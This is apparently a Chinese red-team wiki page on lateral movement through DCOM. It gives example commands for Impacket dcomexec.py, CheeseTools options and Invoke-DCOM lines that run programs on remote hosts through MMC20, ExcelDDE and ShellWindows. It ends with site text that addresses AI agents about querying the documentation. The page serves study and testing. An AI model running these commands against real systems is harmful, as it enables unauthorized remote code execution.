# DCOM ``` DCOM 是 COM(组件对象模型)的扩展,它允许应用程序在远程计算机上实例化和访问 COM 对象的属性和方法。 ``` **Impacket** ``` DCOMExec.py >dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...] >dcomexec.py -share C$ -object MMC20 '/:@' >dcomexec.py -share C$ -object MMC20 '/:@' 'ipconfig' > >python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe' -object MMC20 是指定我们希望实例化 MMC20.Application 对象 -silentcommand 无回显执行 ``` **CheeseTools** ``` https://github.com/klezVirus/CheeseTools https://klezvirus.github.io/RedTeaming/LateralMovement/LateralMovementDCOM/ -t, --target=VALUE 目标机器 -b, --binary=VALUE 二进制文件: powershell.exe -a, --args=VALUE Arguments: -enc -m, --method=VALUE Methods: MMC20Application, ShellWindows, ShellBrowserWindow, ExcelDDE, VisioAddonEx, OutlookShellEx, ExcelXLL, VisioExecLine, OfficeMacro -r, --reg, --registry Enable registry manipulation -h, -?, --help Show Help 当前方法: MMC20.Application, ShellWindows, ShellBrowserWindow, ExcelDDE, VisioAddonEx, OutlookShellEx, ExcelXLL, VisioExecLine, OfficeMacro ``` **Invoke-DCOM** ``` https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Invoke-DCOM.ps1 >Import-Module .\Invoke-DCOM.ps1 >Invoke-DCOM -ComputerName '10.10.10.10' -Method MMC20.Application -Command "calc.exe" >Invoke-DCOM -ComputerName '10.10.10.10' -Method ExcelDDE -Command "calc.exe" >Invoke-DCOM -ComputerName '10.10.10.10' -Method ServiceStart "MyService" >Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellBrowserWindow -Command "calc.exe" >Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellWindows -Command "calc.exe" ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/heng-xiang-yi-dong/dcom-exploitation/dcom.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.